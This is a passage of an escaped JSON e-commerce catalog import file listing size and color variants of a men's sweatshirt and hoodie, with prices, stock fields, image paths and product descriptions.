Sweatshirt-L-Green\",\"description\":\"<p>Kick off your weekend in the Hollister Backyard Sweatshirt. Whether you\'re raking leaves or flipping burgers, this comfy layer blocks the bite of the crisp autumn air. Puffy thick from hood to hem, it traps heat against your core.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with navy sleeves\\/trim.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed cuffs and hem. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hollister-backyard-sweatshirt-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},{\"sku\":\"MH05-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hollister Backyard Sweatshirt-L-Red\",\"description\":\"<p>Kick off your weekend in the Hollister Backyard Sweatshirt. Whether you\'re raking leaves or flipping burgers, this comfy layer blocks the bite of the crisp autumn air. Puffy thick from hood to hem, it traps heat against your core.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with navy sleeves\\/trim.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed cuffs and hem. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hollister-backyard-sweatshirt-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},{\"sku\":\"MH05-L-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hollister Backyard Sweatshirt-L-White\",\"description\":\"<p>Kick off your weekend in the Hollister Backyard Sweatshirt. Whether you\'re raking leaves or flipping burgers, this comfy layer blocks the bite of the crisp autumn air. Puffy thick from hood to hem, it traps heat against your core.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with navy sleeves\\/trim.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed cuffs and hem. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hollister-backyard-sweatshirt-l-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh05-white_alt1.jpg,\\/m\\/h\\/mh05-white_back.jpg\",\"image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh05-white_alt1.jpg,\\/m\\/h\\/mh05-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"White\"},{\"sku\":\"MH05-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hollister Backyard Sweatshirt-XL-Green\",\"description\":\"<p>Kick off your weekend in the Hollister Backyard Sweatshirt. Whether you\'re raking leaves or flipping burgers, this comfy layer blocks the bite of the crisp autumn air. Puffy thick from hood to hem, it traps heat against your core.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with navy sleeves\\/trim.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed cuffs and hem. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hollister-backyard-sweatshirt-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},{\"sku\":\"MH05-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hollister Backyard Sweatshirt-XL-Red\",\"description\":\"<p>Kick off your weekend in the Hollister Backyard Sweatshirt. Whether you\'re raking leaves or flipping burgers, this comfy layer blocks the bite of the crisp autumn air. Puffy thick from hood to hem, it traps heat against your core.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with navy sleeves\\/trim.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed cuffs and hem. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hollister-backyard-sweatshirt-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},{\"sku\":\"MH05-XL-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hollister Backyard Sweatshirt-XL-White\",\"description\":\"<p>Kick off your weekend in the Hollister Backyard Sweatshirt. Whether you\'re raking leaves or flipping burgers, this comfy layer blocks the bite of the crisp autumn air. Puffy thick from hood to hem, it traps heat against your core.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with navy sleeves\\/trim.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed cuffs and hem. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hollister-backyard-sweatshirt-xl-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh05-white_alt1.jpg,\\/m\\/h\\/mh05-white_back.jpg\",\"image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh05-white_alt1.jpg,\\/m\\/h\\/mh05-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"White\"},{\"sku\":\"MH05\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hollister Backyard Sweatshirt\",\"description\":\"<p>Kick off your weekend in the Hollister Backyard Sweatshirt. Whether you\'re raking leaves or flipping burgers, this comfy layer blocks the bite of the crisp autumn air. Puffy thick from hood to hem, it traps heat against your core.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with navy sleeves\\/trim.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed cuffs and hem. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,material=Wool|Polyester|Nylon,pattern=Color-Blocked,climate=Cool,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MH05-XS-Green,size=XS,color=Green|sku=MH05-XS-Red,size=XS,color=Red|sku=MH05-XS-White,size=XS,color=White|sku=MH05-S-Green,size=S,color=Green|sku=MH05-S-Red,size=S,color=Red|sku=MH05-S-White,size=S,color=White|sku=MH05-M-Green,size=M,color=Green|sku=MH05-M-Red,size=M,color=Red|sku=MH05-M-White,size=M,color=White|sku=MH05-L-Green,size=L,color=Green|sku=MH05-L-Red,size=L,color=Red|sku=MH05-L-White,size=L,color=White|sku=MH05-XL-Green,size=XL,color=Green|sku=MH05-XL-Red,size=XL,color=Red|sku=MH05-XL-White,size=XL,color=White\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh05-white_alt1.jpg,\\/m\\/h\\/mh05-white_back.jpg\",\"image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh05-white_alt1.jpg,\\/m\\/h\\/mh05-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"material\":\"Wool|Polyester|Nylon\",\"pattern\":\"Color-Blocked\",\"climate\":\"Cool\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},{\"sku\":\"MH06-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Stark Fundamental Hoodie-XS-Black\",\"description\":\"<p>You don\'t need bells and whistles when performance speaks for itself. The full-zip Stark Fundamental Hoodie give just what you need. Hood and fleece lining keep you warm, while breathable fabric and wicking technology won\'t let you overheat.<\\/p>\\n<p>&bull; Navy specked full zip hoodie.<br \\/>&bull; Ribbed cuffs, banded waist.<br \\/>&bull; Side pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"stark-fundamental-hoodie-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh06-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},{\"sku\":\"MH06-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Stark Fundamental Hoodie-XS-Blue\",\"description\":\"<p>You don\'t need bells and whistles when performance speaks for itself. The full-zip Stark Fundamental Hoodie give just what you need. Hood and fleece lining keep you warm, while breathable fabric and wicking technology won\'t let you overheat.<\\/p>\\n<p>&bull; Navy specked full zip hoodie.<br \\/>&bull; Ribbed cuffs, banded waist.<br \\/>&bull; Side pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"stark-fundamental-hoodie-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_